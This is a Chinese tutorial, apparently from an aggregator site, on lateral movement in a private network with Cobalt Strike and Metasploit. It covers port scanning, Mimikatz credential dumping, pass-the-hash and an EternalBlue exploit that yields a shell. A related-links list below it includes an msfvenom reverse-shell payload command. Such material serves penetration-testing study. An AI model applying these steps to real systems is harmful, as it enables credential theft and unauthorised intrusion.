使用cs与msf进行内网横向移动

2023-11-18

使用cs与msf进行内网横向移动

目标系统为 :192.168.1.123 , 跳板主机为:192.168.1.118

一,使用cs探测内网

1, 将目标上线至CS
在这里插入图片描述
2, 使用cs探测内网信息
查看当前目标系统网络情况,确认目标系统所在内网网段
在这里插入图片描述在这里插入图片描述

3, 使用cs的portscan功能对内网进行扫描
portscan 192.168.1.115-192.168.1.125 22,80,445,3389 arp 1024
在这里插入图片描述
可以看到目标开放了3389,445,80端口;

二,内网横向移动

对当前目标系统所获取的信息进行分析,方标利用获取的信息做横向移动,获取网段内其他主机的权限
,主要从三点入手:hash攻击;脆弱的服务 445;web 80

1, 使用cs使用hash传递攻击
1)获取目标系统账户密码:
首先我们要获取主机 118的账号密码,来尝试登入123的主机
使用cs的明文密码获取模块Run Mimlkatz提取:
在这里插入图片描述在这里插入图片描述

2)利用哈希传递攻击
在cs中找到探测的内网主机,所有的内网主机都会targets 中显示
在这里插入图片描述
选择一台内网主机进行hash传递攻击:
在这里插入图片描述
选择用户凭证可以是明文密码或hash,选择监听器和已建立连接的会话:
在这里插入图片描述
192.168.1.123成功上线:
在这里插入图片描述
在这里插入图片描述

2,利用脆弱的服务
利用445 smb服务来进行攻击(永恒之蓝漏洞)
目标123开放445,因此将cs会话转入msf,通过msf检测永恒之蓝以及利用:
1) 将cs会话转移至msf:
使用msf监听模块,设置32位payload,监听ip,端口:
在这里插入图片描述!在这里插入图片描述
成功转入会话:
在这里插入图片描述
因为msf从cs中获取的会话默认是32位的版本,因此获得会话后,需要使用msf模块将会话换成和目标系统相同的进程版本(x64):
在这里插入图片描述
设置session,如果你的session为system权限,需要将IGNORE_SYSTEM参设设置为true或者1,这里我的session为administrator,因此只需设置session参数:
在这里插入图片描述在这里插入图片描述

2) 使用msf来探测内网:
由于目标位于内网,因此需要在msf对目标扫描前使用内置模块做路由设置:
在这里插入图片描述
使用端口扫描模块对目标系统进行端口扫描
在这里插入图片描述
设置目标ip,扫描端口:
在这里插入图片描述
3) msf永恒之蓝漏洞检测与利用:
可以看到目标445端口开放,使用msf模块检测漏洞:
在这里插入图片描述
目标极有可能存在永恒之蓝漏洞
使用msf永恒之蓝漏洞利用模块,获取目标shell连接:
设置目标ip,payload设置为主动shell连接
在这里插入图片描述
成功获取目标shell:
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

使用cs与msf进行内网横向移动 的相关文章

  • MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17 010永恒之蓝漏洞利用 准备扫描漏洞漏洞攻击 准备 实验准备环境 xff1a 被攻击机 xff1a 虚拟机win7x64位系统 其IP为 xff1a 10 101 2 11 xff08 关闭了防火墙 xff09 攻击机 x
  • kali下msf提权

    生成木马 Msfvenom p windows meterpreter reverse tcp lhost 61 192 168 184 132 lport 61 4444 f exe o root Desktop 1 exe 配置监听程序
  • MSF详细解读与使用

    转载自 xff1a https www cnblogs com ilekoaiq p 9311357 html 相机IMU融合四部曲 xff08 三 xff09 MSF详细解读与使用 极品巧克力 前言 通过前两篇文章 xff0c D LG
  • 渗透测试工具之Metasploit Framework(MSF)

    一 Metasploit Framework xff08 MSF xff09 简介 Metasploit是当前信息安全与渗透测试领域最流行的术语 xff0c 它的出现颠覆了以往的已有的渗透测试的方式 几乎所有流行的操作系统都支持Metasp
  • ethzasl_msf(multi-sensor fusion)传感器融合定位算法解析

    瑞士苏黎世大学Stephen Weiss对基于EFK松耦合传感器融合定位研究非常深入 xff0c 以下是他的相关论文和开源代码 xff0c 可以详细阅读 xff0c 最后附上了本人阅读的相关博客 1 论文 1 Vision Based Na
  • Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程

    由于是实战 肯定要一个服务器对吗 为了不搞破坏 我这里就不用服务器了 我现在已经用另一台电脑搭建了一个网站 用phpstudy快速搭建的 这台电脑IP是 192 168 1 103 我用的是渗透测试系统Kali Linux 由于此系统是自带
  • 互联网的组成——边缘部分+核心部分 (互联网报文交换方式:分组转发技术)

    首先 复习的第一本书是 计算机网络 作为计算机专业的学生 计算机网络是必须学好的一门功课 互联网的组成 边缘部分 核心部分 从互联网的工作方式上看 可以划分为两大块 1 边缘部分 由所有连接在互联网上的主机组成 这部分是用户直接使用的 用来
  • 内网安全:WMI协议与SMB协议横向移动

    目录 网络拓扑图 网络环境说明 WMI协议 SMB协议 域内信息收集 WMI协议 横向移动 利用方式一 wmic命令 利用方式一 cscript 利用方式一 impacket SMB协议 横向移动 利用方式一 psexec 利用方式二 ps
  • 使用msf监听模块接收反弹shell

    Metasploit Framework MSF 提供了多种方式来监听反弹 shell 使用 multi handler 模块 这是 MSF 中最常用的模块之一 用于监听反弹 shell 它支持多个协议和 payload 可以根据需要进行配
  • open【部署、使用教程】

    目录 1 创建证书 2 安装openVPN Server端并配置 3 将证书移动到相对路径 4 开启内核转发功能 否则会无法启动openVPN 5 启动服务 加入开机自启 6 启动后服务端会生成一个tun0的虚拟网卡 用于不同网段之间相互通
  • 学习君github

    一 冰蝎 https github com rebeyond Behinder 源代码审计漏洞 白盒测试的各种漏洞风险描述或具体修复方案 https github com wooyunwang Fortify Golang 100天从新手到
  • 程序员的自我修养——链接,装载与库

    章节目录 静态链接 编译和链接 目标文件 静态链接 windows COFF 装载和动态链接 可执行文件的装载与进程 动态链接 Linux共享库的组织 Windows下的动态链接 库与运行库 内存 运行库 系统调用与API 运行库实现 一
  • Skeleton Key(万能密码)与 Hook PasswordChangeNotify

    1 Skeleton Key 使用Skeleton Key 万能密码 可以对域内权限进行持久化操作 Skeleton Key特点 Skeleton Key被安装在64位域控服务器上 支持Windows Server2003 Windows
  • ATK&CK红队评估实战靶场(一)

    ATK CK红队评估实战靶场 一 的搭建和模拟攻击过程全过程 回到顶部 0x01 前言 本靶机环境是红日团队开源的一个红队实战测试环境 靶机下载地址如下 http vulnstack qiyuanxuetang net vuln detai
  • FBX+VS2015配置 留意

    1 下载安装FBX SDK 2 include 和 lib 包含目录以及库目录设置 3 以下选择一种 附加依赖项libfbxsdk lib 忽略特定默认库LIBCPMT lib C C 预处理器FBXSDK SHARED 附加依赖项libf
  • 权限维持-白银票据

    前言 白银票据是利用域的服务账户进行伪造ST 需要一些服务进行交互 比如cifs 共享文件服务 mysql sqlserver之类的 所以白银票据是没有黄金票据这么好用的 但是比白银票据更加隐藏一些 注 限定域环境 复现 1 收集信息 还是
  • C/S 和 P2P

    紫色代表一级目录 粉红代表二级目录 蓝色代表三级目录 红色代表关键字 橙色代表说明 C S 客户 client 和服务器 server 都是指通信中所涉及的两个应用进程 客户服务器方式所描述的是进程之间服务和被服务的关系 客户是服务的请求方
  • C++:文件操作:向文件追加内容

    向文件写入 include
  • 渗透Metasploitable主机

    攻击机 kali 靶机 Metasploitable2 一个特制的ubuntu操作系统 设计初衷作为安全工具测试和演示常见漏洞攻击的环境 默认开放高危端口如21 22 23 445 6000等等 而且具有很多未打补丁的高危漏洞 Metasp
  • ATT&CK实战系列——红队实战(一)红日靶场1

    目录 靶场搭建 拓扑图 配置网络 外网打点web服务器 信息搜集 nmap扫端口服务 dirsearch目录扫描 phpmyadmin日志getshell yxcms 后台getshell xss 关闭win7防火墙 上线msf cs 上线

随机推荐

  • 创建git项目并提交

    1 创建仓库 2 点击创建 3复制gitee码云的HttpS连接 4 提交上传 打开项目并点击菜单栏上的 CVS Import into version control Create Git Repository 创建本地仓库 在打开的 C
  • 小米笔记本Pro安装Win+Mac双系统,时间同步不一致问题!

    安装win和Mac 双系统 时间同步不一样的问题 可以通过补丁解决 Win注册表CMD注入或Mac下安装注入 二选一打补丁 1 Win下操作以管理员运行CMD命令行Reg add HKLM SYSTEM CurrentControlSet
  • 基于时空网络的出租车OD需求预测-简介

    最近单曲循环的一首歌 分享给大家 1 文章信息 Contextualized Spatial Temporal Network for Taxi rigin Destination Demand Prediction 2019发在IEEE
  • RecyclerView应用复习

    导包 implementation androidx recyclerview recyclerview 1 1 0 recyclerview implementation com zhy base rvadapter 3 0 3 adap
  • AttributeError: module ‘torch.cuda.amp‘ has no attribute ‘autocast‘

    参考 https zhuanlan zhihu com p 165152789 https zhuanlan zhihu com p 176998729 https pytorch org docs stable amp html http
  • 渠道系统和 OA系统待办事项接口

    OA待办 已办 以及通过ltpatoken查找用户拼音接口 接口采用http get方式 将需要的参数传入 Content Type application json charset UTF 8 getMethod addRequestHe
  • 错误: 无法从静态上下文中引用非静态 变量 this

    JAVA菜鸟笔记 错误 无法从静态上下文中引用非静态 变量 this 1 09 17 Hello java 错误 无法从静态上下文中引用非静态 变量 this 错误原因 main方法是一个静态方法 而静态方法中无法引用非静态变量 因为静态方
  • STC单片机 延时 那点事,DS18B20的苦

    DS18B20采用 一线总线 对时序的要求是特高啊 要想精准延时 有两个选择 其一当属定时器 其二用汇编一条一条的来算 但 DS18B20延时的时候 以上两条都不会选 还有其他选择 第三方的Delay函数 比如STC ISP VXX X提供
  • 惊艳的时间轮定时器

    问题引入 游戏里面每个Player身上有很多buffs 在每一个tick 最小时间段 都要去检查buff里面的每一个buff是不是过期 产生的效果如何 造成在每个tick里面都去遍历一个长list 明显很不好 怎么优化 1 原始模型 buf
  • c++智能指针

    C 智能指针详解 C 有四个智能指针 auto ptr unique ptr shared ptr weak ptr 其中后三个是C 11支持 第一个已经被C 11弃用 智能指针介绍 智能指针主要用于管理在堆上分配的内存 它将普通的指针封装
  • IP子网划分

    一 子网划分基础 需要掌握二进制与十进制之间的熟练转化 第一篇已经详细介绍过 二 IP地址组成及其分类 目前的IP地址是 IPv4 地址 1 IP地址有两部分组成 网络号码字段 net id 用于区分不同网络 主机号码字段 host id
  • HarmonyOS基础答疑

    本帖收录 HarmonyOS开发者交流群 常见的问题答疑 另外有相关问题可以补充到本帖 Q1 如何获取DevEco Studio 2 0 版本计划 获取方式 答 现在起 可在HarmonyOS官网上 下载HarmonyOS应用开发IDE D
  • 如何让PowerShell显示中文不乱码

    如今软件日益国际化的今天 Windows下的命令行却还顽固地使用本地编码来显示数据 这导致用UTF 8编码的文件在命令行显示乱码 虽说Cygwin的内核cygwin1 dll有自动转换功能 可是因为GB2312中没有变音符号等特殊字符 某些
  • CGI的基本定义和优劣势是什么

    通用网关接口 CGI 是网络服务器之间的交集 通过它可以在外部应用程序和服务器之间进行标准化数据交换 它属于现存最古老的在线界面技术 至今仍被一些知名虚拟主机提供商使用 使用CGI 时 HTML页面不需要存储在服务器上 而是可以在用户进行网
  • 总结几个C语言小程序

    一 打印正方形 该程序通过用户输入一个正方形的边长 L 然后利用嵌套的 for 循环来打印出具有边框的正方形图案 程序如下 include
  • mybatis xml文件中statementType类型

    xml文件示例如下
  • 根目录扩容(SUSE系列,版本1)

    LVM 方式 需求 给根目录和 oradata目录扩容 背景 1 可用闲置盘400G 2 web应用和数据库部在同台机器 3 应用所用目录为根目录 数据库用 oradata目录 4 计划给根100G oradata 300G磁盘大小 步骤
  • 那些好用过头的键盘

    目录 一 好键盘的重要性 二 关于keychron机械键盘 1 轴体部分 1 1 红轴 1 2 青轴 1 3 茶轴 1 4 黑轴 1 5 其他轴 2 性价比 2 1 外观 2 2 连接方式 2 3 轴体 2 4 摔打性 2 5 价格 三 总
  • 稿费一般多少钱一千字_写一篇1000字的稿子多少钱?一般

    目录 1 关于稿子代写 一般稿子分三种类型 第一种 原创稿子 第二种 转发稿子 第三种 书评稿子 这些都是主分类 当前每个主分类肯定会包含很多的子分类 如 翻译稿子 新闻稿子 演讲稿子 会议稿子 等等 当然稿子是有规定的书写格式 并不是随便
  • 使用cs与msf进行内网横向移动

    使用cs与msf进行内网横向移动 目标系统为 192 168 1 123 跳板主机为 192 168 1 118 一 使用cs探测内网 1 将目标上线至CS 2 使用cs探测内网信息 查看当前目标系统网络情况 确认目标系统所在内网网段 3